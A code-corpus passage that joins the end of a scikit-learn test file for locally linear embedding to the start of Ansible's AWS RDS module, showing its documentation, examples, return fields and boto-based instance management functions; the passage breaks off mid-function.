X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
for method in ["standard", "hessian", "modified", "ltsa"]:
clf = manifold.LocallyLinearEmbedding(n_neighbors=6,
n_components=n_components,
method=method, random_state=0)
tol = 1.5 if method == "standard" else 3
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X)
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
details = ("solver: %s, method: %s" % (solver, method))
assert_less(reconstruction_error, tol, msg=details)
assert_less(np.abs(clf.reconstruction_error_ -
reconstruction_error),
tol * reconstruction_error, msg=details)
def test_pipeline():
# check that LocallyLinearEmbedding works fine as a Pipeline
# only checks that no error is raised.
# TODO check that it actually does something useful
from sklearn import pipeline, datasets
X, y = datasets.make_blobs(random_state=0)
clf = pipeline.Pipeline(
[('filter', manifold.LocallyLinearEmbedding(random_state=0)),
('clf', neighbors.KNeighborsClassifier())])
clf.fit(X, y)
assert_less(.9, clf.score(X, y))
# Test the error raised when the weight matrix is singular
def test_singular_matrix():
from nose.tools import assert_raises
M = np.ones((10, 3))
f = ignore_warnings
assert_raises(ValueError, f(manifold.locally_linear_embedding),
M, 2, 1, method='standard', eigen_solver='arpack')
| bsd-3-clause |
dataxu/ansible | lib/ansible/modules/cloud/amazon/rds.py | 30 | 55573 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rds
version_added: "1.3"
short_description: create, delete, or modify an Amazon rds instance
description:
- Creates, deletes, or modifies rds instances. When creating an instance it can be either a new instance or a read-only replica of an existing
instance. This module has a dependency on python-boto >= 2.5. The 'promote' command requires boto >= 2.18.0. Certain features such as tags rely
on boto.rds2 (boto >= 2.26.0)
options:
command:
description:
- Specifies the action to take. The 'reboot' option is available starting at version 2.0
required: true
choices: [ 'create', 'replicate', 'delete', 'facts', 'modify' , 'promote', 'snapshot', 'reboot', 'restore' ]
instance_name:
description:
- Database instance identifier. Required except when using command=facts or command=delete on just a snapshot
required: false
default: null
source_instance:
description:
- Name of the database to replicate. Used only when command=replicate.
required: false
default: null
db_engine:
description:
- The type of database. Used only when command=create.
- mariadb was added in version 2.2
required: false
default: null
choices: ['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee',
'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex', 'sqlserver-web', 'postgres', 'aurora']
size:
description:
- Size in gigabytes of the initial storage for the DB instance. Used only when command=create or command=modify.
required: false
default: null
instance_type:
description:
- The instance type of the database. Must be specified when command=create. Optional when command=replicate, command=modify or command=restore.
If not specified then the replica inherits the same instance type as the source instance.
required: false
default: null
username:
description:
- Master database username. Used only when command=create.
required: false
default: null
password:
description:
- Password for the master database username. Used only when command=create or command=modify.
required: false
default: null
region:
description:
- The AWS region to use. If not specified then the value of the EC2_REGION environment variable, if any, is used.
required: true
aliases: [ 'aws_region', 'ec2_region' ]
db_name:
description:
- Name of a database to create within the instance. If not specified then no database is created. Used only when command=create.
required: false
default: null
engine_version:
description:
- Version number of the database engine to use. Used only when command=create. If not specified then the current Amazon RDS default engine version is used
required: false
default: null
parameter_group:
description:
- Name of the DB parameter group to associate with this instance. If omitted then the RDS default DBParameterGroup will be used. Used only
when command=create or command=modify.
required: false
default: null
license_model:
description:
- The license model for this DB instance. Used only when command=create or command=restore.
required: false
default: null
choices: [ 'license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license' ]
multi_zone:
description:
- Specifies if this is a Multi-availability-zone deployment. Can not be used in conjunction with zone parameter. Used only when command=create or
command=modify.
choices: [ "yes", "no" ]
required: false
default: null
iops:
description:
- Specifies the number of IOPS for the instance. Used only when command=create or command=modify. Must be an integer greater than 1000.
required: false
default: null
security_groups:
description:
- Comma separated list of one or more security groups. Used only when command=create or command=modify.
required: false
default: null
vpc_security_groups:
description:
- Comma separated list of one or more vpc security group ids. Also requires `subnet` to be specified. Used only when command=create or command=modify.
required: false
default: null
port:
description:
- Port number that the DB instance uses for connections. Used only when command=create or command=replicate.
- Prior to 2.0 it always defaults to null and the API would use 3306, it had to be set to other DB default values when not using MySql.
Starting at 2.0 it automatically defaults to what is expected for each C(db_engine).
required: false
default: 3306 for mysql, 1521 for Oracle, 1433 for SQL Server, 5432 for PostgreSQL.
upgrade:
description:
- Indicates that minor version upgrades should be applied automatically. Used only when command=create or command=replicate.
required: false
default: no
choices: [ "yes", "no" ]
option_group:
description:
- The name of the option group to use. If not specified then the default option group is used. Used only when command=create.
required: false
default: null
maint_window:
description:
- >
Maintenance window in format of ddd:hh24:mi-ddd:hh24:mi. (Example: Mon:22:00-Mon:23:15) If not specified then a random maintenance window is
assigned. Used only when command=create or command=modify.
required: false
default: null
backup_window:
description:
- Backup window in format of hh24:mi-hh24:mi. If not specified then a random backup window is assigned. Used only when command=create or command=modify.
required: false
default: null
backup_retention:
description:
- >
Number of days backups are retained. Set to 0 to disable backups. Default is 1 day. Valid range: 0-35. Used only when command=create or
command=modify.
required: false
default: null
zone:
description:
- availability zone in which to launch the instance. Used only when command=create, command=replicate or command=restore.
required: false
default: null
aliases: ['aws_zone', 'ec2_zone']
subnet:
description:
- VPC subnet group. If specified then a VPC instance is created. Used only when command=create.
required: false
default: null
snapshot:
description:
- Name of snapshot to take. When command=delete, if no snapshot name is provided then no snapshot is taken. If used with command=delete with
no instance_name, the snapshot is deleted. Used with command=facts, command=delete or command=snapshot.
required: false
default: null
aws_secret_key:
description:
- AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.
required: false
aliases: [ 'ec2_secret_key', 'secret_key' ]
aws_access_key:
description:
- AWS access key. If not set then the value of the AWS_ACCESS_KEY environment variable is used.
required: false
default: null
aliases: [ 'ec2_access_key', 'access_key' ]
wait:
description:
- When command=create, replicate, modify or restore then wait for the database to enter the 'available' state. When command=delete wait for
the database to be terminated.
required: false
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
apply_immediately:
description:
- Used only when command=modify. If enabled, the modifications will be applied as soon as possible rather than waiting for the next
preferred maintenance window.
default: no
choices: [ "yes", "no" ]
force_failover:
description:
- Used only when command=reboot. If enabled, the reboot is done using a MultiAZ failover.
required: false
default: "no"
choices: [ "yes", "no" ]
version_added: "2.0"
new_instance_name:
description:
- Name to rename an instance to. Used only when command=modify.
required: false
default: null
version_added: "1.5"
character_set_name:
description:
- Associate the DB instance with a specified character set. Used with command=create.
required: false
default: null
version_added: "1.9"
publicly_accessible:
description:
- explicitly set whether the resource should be publicly accessible or not. Used with command=create, command=replicate. Requires boto >= 2.26.0
required: false
default: null
version_added: "1.9"
tags:
description:
- tags dict to apply to a resource. Used with command=create, command=replicate, command=restore. Requires boto >= 2.26.0
required: false
default: null
version_added: "1.9"
requirements:
- "python >= 2.6"
- "boto"
author:
- "Bruce Pennypacker (@bpennypacker)"
- "Will Thames (@willthames)"
extends_documentation_fragment:
- aws
- ec2
'''
# FIXME: the command stuff needs a 'state' like alias to make things consistent -- MPD
EXAMPLES = '''
# Basic mysql provisioning example
- rds:
command: create
instance_name: new-database
db_engine: MySQL
size: 10
instance_type: db.m1.small
username: mysql_admin
password: 1nsecure
tags:
Environment: testing
Application: cms
# Create a read-only replica and wait for it to become available
- rds:
command: replicate
instance_name: new-database-replica
source_instance: new_database
wait: yes
wait_timeout: 600
# Delete an instance, but create a snapshot before doing so
- rds:
command: delete
instance_name: new-database
snapshot: new_database_snapshot
# Get facts about an instance
- rds:
command: facts
instance_name: new-database
register: new_database_facts
# Rename an instance and wait for the change to take effect
- rds:
command: modify
instance_name: new-database
new_instance_name: renamed-database
wait: yes
# Reboot an instance and wait for it to become available again
- rds:
command: reboot
instance_name: database
wait: yes
# Restore a Postgres db instance from a snapshot, wait for it to become available again, and
# then modify it to add your security group. Also, display the new endpoint.
# Note that the "publicly_accessible" option is allowed here just as it is in the AWS CLI
- local_action:
module: rds
command: restore
snapshot: mypostgres-snapshot
instance_name: MyNewInstanceName
region: us-west-2
zone: us-west-2b
subnet: default-vpc-xx441xxx
publicly_accessible: yes
wait: yes
wait_timeout: 600
tags:
Name: pg1_test_name_tag
register: rds
- local_action:
module: rds
command: modify
instance_name: MyNewInstanceName
region: us-west-2
vpc_security_groups: sg-xxx945xx
- debug:
msg: "The new db endpoint is {{ rds.instance.endpoint }}"
'''
RETURN = '''
engine:
description: the name of the database engine
returned: when RDS instance exists
type: string
sample: "oracle-se"
engine_version:
description: the version of the database engine
returned: when RDS instance exists
type: string
sample: "11.2.0.4.v6"
license_model:
description: the license model information
returned: when RDS instance exists
type: string
sample: "bring-your-own-license"
character_set_name:
description: the name of the character set that this instance is associated with
returned: when RDS instance exists
type: string
sample: "AL32UTF8"
allocated_storage:
description: the allocated storage size in gigabytes (GB)
returned: when RDS instance exists
type: string
sample: "100"
publicly_accessible:
description: the accessibility options for the DB instance
returned: when RDS instance exists
type: boolean
sample: "true"
latest_restorable_time:
description: the latest time to which a database can be restored with point-in-time restore
returned: when RDS instance exists
type: string
sample: "1489707802.0"
secondary_avaialbility_zone:
description: the name of the secondary AZ for a DB instance with multi-AZ support
returned: when RDS instance exists and is multy-AZ
type: string
sample: "eu-west-1b"
backup_window:
description: the daily time range during which automated backups are created if automated backups are enabled
returned: when RDS instance exists and automated backups are enabled
type: string
sample: "03:00-03:30"
auto_minor_version_upgrade:
description: indicates that minor engine upgrades will be applied automatically to the DB instance during the maintenance window
returned: when RDS instance exists
type: boolean
sample: "true"
read_replica_source_dbinstance_identifier:
description: the identifier of the source DB instance if this RDS instance is a read replica
returned: when read replica RDS instance exists
type: string
sample: "null"
db_name:
description: the name of the database to create when the DB instance is created
returned: when RDS instance exists
type: string
sample: "ASERTG"
parameter_groups:
description: the list of DB parameter groups applied to this RDS instance
returned: when RDS instance exists and parameter groups are defined
type: complex
contains:
parameter_apply_status:
description: the status of parameter updates
returned: when RDS instance exists
type: string
sample: "in-sync"
parameter_group_name:
description: the name of the DP parameter group
returned: when RDS instance exists
type: string
sample: "testawsrpprodb01spfile-1ujg7nrs7sgyz"
option_groups:
description: the list of option group memberships for this RDS instance
returned: when RDS instance exists
type: complex
contains:
option_group_name:
description: the option group name for this RDS instance
returned: when RDS instance exists
type: string
sample: "default:oracle-se-11-2"
status:
description: the status of the RDS instance's option group membership
returned: when RDS instance exists
type: string
sample: "in-sync"
pending_modified_values:
description: a dictionary of changes to the RDS instance that are pending
returned: when RDS instance exists
type: complex
contains:
db_instance_class:
description: the new DB instance class for this RDS instance that will be applied or is in progress
returned: when RDS instance exists
type: string
sample: "null"
db_instance_identifier:
description: the new DB instance identifier this RDS instance that will be applied or is in progress
returned: when RDS instance exists
type: string
sample: "null"
allocated_storage:
description: the new allocated storage size for this RDS instance that will be applied or is in progress
returned: when RDS instance exists
type: string
sample: "null"
backup_retention_period:
description: the pending number of days for which automated backups are retained
returned: when RDS instance exists
type: string
sample: "null"
engine_version:
description: indicates the database engine version
returned: when RDS instance exists
type: string
sample: "null"
iops:
description: the new provisioned IOPS value for this RDS instance that will be applied or is being applied
returned: when RDS instance exists
type: string
sample: "null"
master_user_password:
description: the pending or in-progress change of the master credentials for this RDS instance
returned: when RDS instance exists
type: string
sample: "null"
multi_az:
description: indicates that the single-AZ RDS instance is to change to a multi-AZ deployment
returned: when RDS instance exists
type: string
sample: "null"
port:
description: specifies the pending port for this RDS instance
returned: when RDS instance exists
type: string
sample: "null"
db_subnet_groups:
description: information on the subnet group associated with this RDS instance
returned: when RDS instance exists
type: complex
contains:
description:
description: the subnet group associated with the DB instance
returned: when RDS instance exists
type: string
sample: "Subnets for the UAT RDS SQL DB Instance"
name:
description: the name of the DB subnet group
returned: when RDS instance exists
type: string
sample: "samplesubnetgrouprds-j6paiqkxqp4z"
status:
description: the status of the DB subnet group
returned: when RDS instance exists
type: string
sample: "complete"
subnets:
description: the description of the DB subnet group
returned: when RDS instance exists
type: complex
contains:
availability_zone:
description: subnet availability zone information
returned: when RDS instance exists
type: complex
contains:
name:
description: avaialbility zone
returned: when RDS instance exists
type: string
sample: "eu-west-1b"
provisioned_iops_capable:
description: whether provisioned iops are available in AZ subnet
returned: when RDS instance exists
type: boolean
sample: "false"
identifier:
description: the identifier of the subnet
returned: when RDS instance exists
type: string
sample: "subnet-3fdba63e"
status:
description: the status of the subnet
returned: when RDS instance exists
type: string
sample: "active"
'''
import time
try:
import boto.rds
import boto.exception
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
try:
import boto.rds2
import boto.rds2.exceptions
HAS_RDS2 = True
except ImportError:
HAS_RDS2 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import AWSRetry
from ansible.module_utils.ec2 import HAS_BOTO, connect_to_aws, ec2_argument_spec, get_aws_connection_info
DEFAULT_PORTS = {
'aurora': 3306,
'mariadb': 3306,
'mysql': 3306,
'oracle': 1521,
'sqlserver': 1433,
'postgres': 5432,
}
class RDSException(Exception):
def __init__(self, exc):
if hasattr(exc, 'error_message') and exc.error_message:
self.message = exc.error_message
self.code = exc.error_code
elif hasattr(exc, 'body') and 'Error' in exc.body:
self.message = exc.body['Error']['Message']
self.code = exc.body['Error']['Code']
else:
self.message = str(exc)
self.code = 'Unknown Error'
class RDSConnection:
def __init__(self, module, region, **aws_connect_params):
try:
self.connection = connect_to_aws(boto.rds, region, **aws_connect_params)
except boto.exception.BotoServerError as e:
module.fail_json(msg=e.error_message)
def get_db_instance(self, instancename):
try:
return RDSDBInstance(self.connection.get_all_dbinstances(instancename)[0])
except boto.exception.BotoServerError:
return None
def get_db_snapshot(self, snapshotid):
try:
return RDSSnapshot(self.connection.get_all_dbsnapshots(snapshot_id=snapshotid)[0])
except boto.exception.BotoServerError:
return None
def create_db_instance(self, instance_name, size, instance_class, db_engine,
username, password, **params):
params['engine'] = db_engine
try:
result = self.connection.create_dbinstance(instance_name, size, instance_class,
username, password, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_instance_read_replica(self, instance_name, source_instance, **params):
try:
result = self.connection.createdb_instance_read_replica(instance_name, source_instance, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_instance(self, instance_name, **params):
try:
result = self.connection.delete_dbinstance(instance_name, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_snapshot(self, snapshot):
try:
result = self.connection.delete_dbsnapshot(snapshot)
return RDSSnapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def modify_db_instance(self, instance_name, **params):
try:
result = self.connection.modify_dbinstance(instance_name, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def reboot_db_instance(self, instance_name, **params):
try:
result = self.connection.reboot_dbinstance(instance_name)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params):
try:
result = self.connection.restore_dbinstance_from_dbsnapshot(snapshot, instance_name, instance_type, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_snapshot(self, snapshot, instance_name, **params):
try:
result = self.connection.create_dbsnapshot(snapshot, instance_name)
return RDSSnapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def promote_read_replica(self, instance_name, **params):
try:
result = self.connection.promote_read_replica(instance_name, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
class RDS2Connection:
def __init__(self, module, region, **aws_connect_params):
try:
self.connection = connect_to_aws(boto.rds2, region, **aws_connect_params)
except boto.exception.BotoServerError as e:
module.fail_json(msg=e.error_message)
def get_db_instance(self, instancename):
try:
dbinstances = self.connection.describe_db_instances(
db_instance_identifier=instancename
)['DescribeDBInstancesResponse']['DescribeDBInstancesResult']['DBInstances']
result = RDS2DBInstance(dbinstances[0])
return result
except boto.rds2.exceptions.DBInstanceNotFound as e:
return None
except Exception as e:
raise e
def get_db_snapshot(self, snapshotid):
try:
snapshots = self.connection.describe_db_snapshots(
db_snapshot_identifier=snapshotid,
snapshot_type='manual'
)['DescribeDBSnapshotsResponse']['DescribeDBSnapshotsResult']['DBSnapshots']
result = RDS2Snapshot(snapshots[0])
return result
except boto.rds2.exceptions.DBSnapshotNotFound:
return None
def create_db_instance(self, instance_name, size, instance_class, db_engine,
username, password, **params):
try:
result = self.connection.create_db_instance(instance_name, size, instance_class, db_engine, username, password,
**params)['CreateDBInstanceResponse']['CreateDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_instance_read_replica(self, instance_name, source_instance, **params):
try:
result = self.connection.create_db_instance_read_replica(
instance_name,
source_instance,
**params
)['CreateDBInstanceReadReplicaResponse']['CreateDBInstanceReadReplicaResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_instance(self, instance_name, **params):
try:
result = self.connection.delete_db_instance(instance_name, **params)['DeleteDBInstanceResponse']['DeleteDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_snapshot(self, snapshot):
try:
result = self.connection.delete_db_snapshot(snapshot)['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot']
return RDS2Snapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def modify_db_instance(self, instance_name, **params):
try:
result = self.connection.modify_db_instance(instance_name, **params)['ModifyDBInstanceResponse']['ModifyDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def reboot_db_instance(self, instance_name, **params):
try:
result = self.connection.reboot_db_instance(instance_name, **params)['RebootDBInstanceResponse']['RebootDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params):
try:
result = self.connection.restore_db_instance_from_db_snapshot(
instance_name,
snapshot,
**params
)['RestoreDBInstanceFromDBSnapshotResponse']['RestoreDBInstanceFromDBSnapshotResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_snapshot(self, snapshot, instance_name, **params):
try:
result = self.connection.create_db_snapshot(snapshot, instance_name, **params)['CreateDBSnapshotResponse']['CreateDBSnapshotResult']['DBSnapshot']
return RDS2Snapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def promote_read_replica(self, instance_name, **params):
try:
result = self.connection.promote_read_replica(instance_name, **params)['PromoteReadReplicaResponse']['PromoteReadReplicaResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
class RDSDBInstance:
def __init__(self, dbinstance):
self.instance = dbinstance
self.name = dbinstance.id
self.status = dbinstance.status
def get_data(self):
d = {
'id': self.name,
'create_time': self.instance.create_time,
'status': self.status,
'availability_zone': self.instance.availability_zone,
'backup_retention': self.instance.backup_retention_period,
'backup_window': self.instance.preferred_backup_window,
'maintenance_window': self.instance.preferred_maintenance_window,
'multi_zone': self.instance.multi_az,
'instance_type': self.instance.instance_class,
'username': self.instance.master_username,
'iops': self.instance.iops
}
# Only assign an Endpoint if one is available
if hasattr(self.instance, 'endpoint'):
d["endpoint"] = self.instance.endpoint[0]
d["port"] = self.instance.endpoint[1]
if self.instance.vpc_security_groups is not None:
d["vpc_security_groups"] = ','.join(x.vpc_group for x in self.instance.vpc_security_groups)
else:
d["vpc_security_groups"] = None
else:
d["endpoint"] = None
d["port"] = None
d["vpc_security_groups"] = None
if self.instance.DBName:
d['DBName'] = self.instance.DBName
# ReadReplicaSourceDBInstanceIdentifier may or may not exist
try:
d["replication_source"] = self.instance.ReadReplicaSourceDBInstanceIdentifier
except Exception:
d["replication_source"] = None
return d
class RDS2DBInstance:
def __init__(self, dbinstance):
self.instance = dbinstance
if 'DBInstanceIdentifier' not in dbinstance:
self.name = None
else:
self.name = self.instance.get('DBInstanceIdentifier')
self.status = self.instance.get('DBInstanceStatus')
def get_data(self):
d = {
'id': self.name,
'create_time': self.instance['InstanceCreateTime'],
'engine': self.instance['Engine'],
'engine_version': self.instance['EngineVersion'],
'license_model': self.instance['LicenseModel'],
'character_set_name': self.instance['CharacterSetName'],
'allocated_storage': self.instance['AllocatedStorage'],
'publicly_accessible': self.instance['PubliclyAccessible'],
'latest_restorable_time': self.instance['LatestRestorableTime'],
'status': self.status,
'availability_zone': self.instance['AvailabilityZone'],
'secondary_avaialbility_zone': self.instance['SecondaryAvailabilityZone'],
'backup_retention': self.instance['BackupRetentionPeriod'],
'backup_window': self.instance['PreferredBackupWindow'],
'maintenance_window': self.instance['PreferredMaintenanceWindow'],
'auto_minor_version_upgrade': self.instance['AutoMinorVersionUpgrade'],
'read_replica_source_dbinstance_identifier': self.instance['ReadReplicaSourceDBInstanceIdentifier'],
'multi_zone': self.instance['MultiAZ'],
'instance_type': self.instance['DBInstanceClass'],
'username': self.instance['MasterUsername'],
'db_name': self.instance['DBName'],
'iops': self.instance['Iops'],
'replication_source': self.instance['ReadReplicaSourceDBInstanceIdentifier']
}
if self.instance['DBParameterGroups'] is not None:
parameter_groups = []
for x in self.instance['DBParameterGroups']:
parameter_groups.append({'parameter_group_name': x['DBParameterGroupName'], 'parameter_apply_status': x['ParameterApplyStatus']})
d['parameter_groups'] = parameter_groups
if self.instance['OptionGroupMemberships'] is not None:
option_groups = []
for x in self.instance['OptionGroupMemberships']:
option_groups.append({'status': x['Status'], 'option_group_name': x['OptionGroupName']})
d['option_groups'] = option_groups
if self.instance['PendingModifiedValues'] is not None:
pdv = self.instance['PendingModifiedValues']
d['pending_modified_values'] = {
'multi_az': pdv['MultiAZ'],
'master_user_password': pdv['MasterUserPassword'],
'port': pdv['Port'],
'iops': pdv['Iops'],
'allocated_storage': pdv['AllocatedStorage'],
'engine_version': pdv['EngineVersion'],
'backup_retention_period': pdv['BackupRetentionPeriod'],
'db_instance_class': pdv['DBInstanceClass'],
'db_instance_identifier': pdv['DBInstanceIdentifier']
}
if self.instance["DBSubnetGroup"] is not None:
dsg = self.instance["DBSubnetGroup"]
db_subnet_groups = {}
db_subnet_groups['vpc_id'] = dsg['VpcId']
db_subnet_groups['name'] = dsg['DBSubnetGroupName']
db_subnet_groups['status'] = dsg['SubnetGroupStatus'].lower()
db_subnet_groups['description'] = dsg['DBSubnetGroupDescription']
db_subnet_groups['subnets'] = []
for x in dsg["Subnets"]:
db_subnet_groups['subnets'].append({
'status': x['SubnetStatus'].lower(),
'identifier': x['SubnetIdentifier'],
'availability_zone': {
'name': x['SubnetAvailabilityZone']['Name'],
'provisioned_iops_capable': x['SubnetAvailabilityZone']['ProvisionedIopsCapable']
}
})
d['db_subnet_groups'] = db_subnet_groups
if self.instance["VpcSecurityGroups"] is not None:
d['vpc_security_groups'] = ','.join(x['VpcSecurityGroupId'] for x in self.instance['VpcSecurityGroups'])
if "Endpoint" in self.instance and self.instance["Endpoint"] is not None:
d['endpoint'] = self.instance["Endpoint"].get('Address', None)
d['port'] = self.instance["Endpoint"].get('Port', None)
else:
d['endpoint'] = None
d['port'] = None
if self.instance["DBName"]:
d['DBName'] = self.instance['DBName']
return d
class RDSSnapshot:
def __init__(self, snapshot):
self.snapshot = snapshot
self.name = snapshot.id
self.status = snapshot.status
def get_data(self):
d = {
'id': self.name,
'create_time': self.snapshot.snapshot_create_time,
'status': self.status,
'availability_zone': self.snapshot.availability_zone,
'instance_id': self.snapshot.instance_id,
'instance_created': self.snapshot.instance_create_time,
}
# needs boto >= 2.21.0
if hasattr(self.snapshot, 'snapshot_type'):
d["snapshot_type"] = self.snapshot.snapshot_type
if hasattr(self.snapshot, 'iops'):
d["iops"] = self.snapshot.iops
return d
class RDS2Snapshot:
def __init__(self, snapshot):
if 'DeleteDBSnapshotResponse' in snapshot:
self.snapshot = snapshot['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot']
else:
self.snapshot = snapshot
self.name = self.snapshot.get('DBSnapshotIdentifier')
self.status = self.snapshot.get('Status')
def get_data(self):
d = {
'id': self.name,
'create_time': self.snapshot['SnapshotCreateTime'],
'status': self.status,
'availability_zone': self.snapshot['AvailabilityZone'],
'instance_id': self.snapshot['DBInstanceIdentifier'],
'instance_created': self.snapshot['InstanceCreateTime'],
'snapshot_type': self.snapshot['SnapshotType'],
'iops': self.snapshot['Iops'],
}
return d
def await_resource(conn, resource, status, module):
start_time = time.time()
wait_timeout = module.params.get('wait_timeout') + start_time
check_interval = 5
while wait_timeout > time.time() and resource.status != status:
time.sleep(check_interval)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for RDS resource %s" % resource.name)
if module.params.get('command') == 'snapshot':
# Temporary until all the rds2 commands have their responses parsed
if resource.name is None:
module.fail_json(msg="There was a problem waiting for RDS snapshot %s" % resource.snapshot)
# Back off if we're getting throttled, since we're just waiting anyway
resource = AWSRetry.backoff(tries=5, delay=20, backoff=1.5)(conn.get_db_snapshot)(resource.name)
else:
# Temporary until all the rds2 commands have their responses parsed
if resource.name is None:
module.fail_json(msg="There was a problem waiting for RDS instance %s" % resource.instance)
# Back off if we're getting throttled, since we're just waiting anyway
resource = AWSRetry.backoff(tries=5, delay=20, backoff=1.5)(conn.get_db_instance)(resource.name)
if resource is None:
break
# Some RDS resources take much longer than others to be ready. Check
# less aggressively for slow ones to avoid throttling.
if time.time() > start_time + 90:
check_interval = 20
return resource
def create_db_instance(module, conn):
required_vars = ['instance_name', 'db_engine', 'size', 'instance_type', 'username', 'password']
valid_vars = ['backup_retention', 'backup_window',
'character_set_name', 'db_name', 'engine_version',
'instance_type', 'iops', 'license_model', 'maint_window',
'multi_zone', 'option_group', 'parameter_group', 'port',
'subnet', 'upgrade', 'zone']
if module.params.get('subnet'):
valid_vars.append('vpc_security_groups')
else:
valid_vars.append('security_groups')
if HAS_RDS2:
valid_vars.extend(['publicly_accessible', 'tags'])
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
result = conn.get_db_instance(instance_name)
if result:
changed = False
else:
try:
result = conn.create_db_instance(instance_name, module.params.get('size'),
module.params.get('instance_type'), module.params.get('db_engine'),
module.params.get('username'), module.params.get('password'), **params)
changed = True
except RDSException as e:
module.fail_json(msg="Failed to create instance: %s" % e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def replicate_db_instance(module, conn):
required_vars = ['instance_name', 'source_instance']
valid_vars = ['instance_type', 'port', 'upgrade', 'zone']
if HAS_RDS2:
valid_vars.extend(['iops', 'option_group', 'publicly_accessible', 'tags'])
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
source_instance = module.params.get('source_instance')
result = conn.get_db_instance(instance_name)
if result:
changed = False
else:
try:
result = conn.create_db_instance_read_replica(instance_name, source_instance, **params)
changed = True
except RDSException as e:
module.fail_json(msg="Failed to create replica instance: %s " % e.message)
if module.params.get('wait'):
resource = await_resource(conn, result, 'available', module)
else:
resource = conn.get_db_instance(instance_name)
module.exit_json(changed=changed, instance=resource.get_data())
def delete_db_instance_or_snapshot(module, conn):
required_vars = []
valid_vars = ['instance_name', 'snapshot', 'skip_final_snapshot']
params = validate_parameters(required_vars, valid_vars, module)
instance_name = module.params.get('instance_name')
snapshot = module.params.get('snapshot')
if not instance_name:
result = conn.get_db_snapshot(snapshot)
else:
result = conn.get_db_instance(instance_name)
if not result:
module.exit_json(changed=False)
if result.status == 'deleting':
module.exit_json(changed=False)
try:
if instance_name:
if snapshot:
params["skip_final_snapshot"] = False
if HAS_RDS2:
params["final_db_snapshot_identifier"] = snapshot
else:
params["final_snapshot_id"] = snapshot
else:
params["skip_final_snapshot"] = True
result = conn.delete_db_instance(instance_name, **params)
else:
result = conn.delete_db_snapshot(snapshot)
except RDSException as e:
module.fail_json(msg="Failed to delete instance: %s" % e.message)
# If we're not waiting for a delete to complete then we're all done
# so just return
if not module.params.get('wait'):
module.exit_json(changed=True)
try:
await_resource(conn, result, 'deleted', module)
module.exit_json(changed=True)
except RDSException as e:
if e.code == 'DBInstanceNotFound':
module.exit_json(changed=True)
else:
module.fail_json(msg=e.message)
except Exception as e:
module.fail_json(msg=str(e))
def facts_db_instance_or_snapshot(module, conn):
instance_name = module.params.get('instance_name')
snapshot = module.params.get('snapshot')
if instance_name and snapshot:
module.fail_json(msg="Facts must be called with either instance_name or snapshot, not both")
if instance_name:
resource = conn.get_db_instance(instance_name)
if not resource:
module.fail_json(msg="DB instance %s does not exist" % instance_name)
if snapshot:
resource = conn.get_db_snapshot(snapshot)
if not resource:
module.fail_json(msg="DB snapshot %s does not exist" % snapshot)
module.exit_json(changed=False, instance=resource.get_data())
def modify_db_instance(module, conn):
required_vars = ['instance_name']
valid_vars = ['apply_immediately', 'backup_retention', 'backup_window',
'db_name', 'engine_version', 'instance_type', 'iops', 'license_model',
'maint_window', 'multi_zone', 'new_instance_name',
'option_group', 'parameter_group', 'password', 'size', 'upgrade']
params = validate_parameters(required_vars, valid_vars, module)
